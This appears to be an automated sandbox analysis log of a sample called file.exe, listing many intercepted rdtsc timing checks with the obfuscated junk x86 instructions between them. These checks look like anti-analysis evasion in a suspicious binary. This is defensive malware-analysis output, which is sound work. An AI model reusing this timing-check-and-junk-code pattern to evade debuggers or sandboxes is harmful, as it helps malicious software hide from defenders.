Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BB03 second address: 83BB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BB0E second address: 83BB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b jns 00007F4D45034D18h 0x00000011 popad 0x00000012 pushad 0x00000013 jbe 00007F4D45034D2Ch 0x00000019 jmp 00007F4D45034D26h 0x0000001e jnl 00007F4D45034D18h 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83BB4A second address: 83BB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787289 second address: 7872A1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4D45034D16h 0x00000008 jmp 00007F4D45034D1Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839D96 second address: 839DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839EDE second address: 839EF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F4D45034D16h 0x00000010 jns 00007F4D45034D16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839EF4 second address: 839EFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839EFA second address: 839F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839F00 second address: 839F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A459 second address: 83A45D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A45D second address: 83A47B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A708 second address: 83A725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D22h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A9D3 second address: 83A9D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83A9D9 second address: 83AA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4D45034D28h 0x0000000e pop ecx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4D45034D1Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83AA13 second address: 83AA1D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83AA1D second address: 83AA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 839945 second address: 83994B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83994B second address: 83994F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 847BD6 second address: 847C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ch 0x00000007 push edx 0x00000008 jmp 00007F4D44D051A8h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F4D44D051A8h 0x00000018 jmp 00007F4D44D051A2h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84D2AF second address: 84D2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84D2B5 second address: 84D2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84E927 second address: 84E92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8520FA second address: 852152 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F4D44D051A9h 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F4D44D051A7h 0x00000019 popad 0x0000001a jmp 00007F4D44D051A8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 852152 second address: 852171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D24h 0x00000007 pushad 0x00000008 jno 00007F4D45034D16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 854280 second address: 854286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85850D second address: 858513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858513 second address: 858520 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858520 second address: 858537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4D45034D16h 0x0000000a jc 00007F4D45034D16h 0x00000010 je 00007F4D45034D16h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858537 second address: 85853D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85853D second address: 85854E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85854E second address: 858552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 858250 second address: 858266 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4D45034D1Dh 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1B4 second address: 85E1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1B8 second address: 85E1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1CC second address: 85E1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E1D0 second address: 85E205 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4D45034D16h 0x00000008 jns 00007F4D45034D16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007F4D45034D1Bh 0x00000019 jmp 00007F4D45034D25h 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E205 second address: 85E20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 85E20A second address: 85E210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8610FF second address: 861103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861103 second address: 861109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861109 second address: 861118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007F4D44D05196h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861118 second address: 861128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 861128 second address: 861149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4D44D05196h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jc 00007F4D44D051A1h 0x00000013 jmp 00007F4D44D0519Bh 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 862845 second address: 86285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D21h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86285C second address: 86286B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F4D44D0519Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 868A04 second address: 868A1C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4D45034D1Eh 0x00000008 ja 00007F4D45034D16h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F4D45034D16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8708B4 second address: 8708BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8708BA second address: 8708C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4D45034D16h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F23F second address: 86F248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F248 second address: 86F25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F4E8 second address: 86F4F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86F4F0 second address: 86F513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D27h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007F4D45034D16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8705D0 second address: 8705D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8705D6 second address: 8705E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 874187 second address: 87418E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A779 second address: 78A77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A77F second address: 78A79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4D44D051A4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78A79A second address: 78A7A9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894139 second address: 89413F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89413F second address: 894156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4D45034D1Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894156 second address: 894177 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4D44D051A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 894177 second address: 89417B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897145 second address: 89714F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 89714F second address: 897159 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897159 second address: 897163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4D44D05196h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897163 second address: 897169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897169 second address: 897181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4D44D0519Ah 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897181 second address: 897186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 897186 second address: 897197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnl 00007F4D44D05196h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AC8EF second address: 8AC902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4D45034D16h 0x0000000a pop edx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8AC902 second address: 8AC906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1350 second address: 8B1354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1354 second address: 8B136D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4D44D0519Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B01F9 second address: 8B0203 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B078C second address: 8B0799 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0799 second address: 8B07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0D12 second address: 8B0D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0D1B second address: 8B0D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0E67 second address: 8B0E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A6h 0x00000007 jnc 00007F4D44D05196h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F4D44D051A0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B0E9A second address: 8B0EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0507 second address: 4FF050E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF050E second address: 4FF0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4D44D0519Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0525 second address: 4FF054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F4D45034D24h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bl, 2Dh 0x00000017 mov bx, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF054F second address: 4FF0561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D44D0519Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0561 second address: 4FF059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4D45034D29h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4D45034D1Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF059C second address: 4FF05EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov eax, 5A839DA3h 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F4D44D051A4h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F4D44D051A8h 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF05EC second address: 4FF0607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0607 second address: 4FF060B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0627 second address: 4FF062D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF062D second address: 4FF0633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0633 second address: 4FF0637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0637 second address: 4FF063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF063B second address: 4FF0042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F4D45034D1Ch 0x0000000f je 00007F4DB5AE2D1Ah 0x00000015 xor eax, eax 0x00000017 jmp 00007F4D4500E44Ah 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f leave 0x00000020 retn 0004h 0x00000023 nop 0x00000024 mov edi, eax 0x00000026 cmp edi, 00000000h 0x00000029 setne al 0x0000002c xor ebx, ebx 0x0000002e test al, 01h 0x00000030 jne 00007F4D45034D17h 0x00000032 jmp 00007F4D45034E09h 0x00000037 call 00007F4D49A3C490h 0x0000003c mov edi, edi 0x0000003e jmp 00007F4D45034D1Bh 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 mov ebx, esi 0x00000047 mov eax, 6D92A8C7h 0x0000004c popad 0x0000004d push eax 0x0000004e jmp 00007F4D45034D1Dh 0x00000053 xchg eax, ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F4D45034D28h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0042 second address: 4FF0048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FF0048 second address: 4FF004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
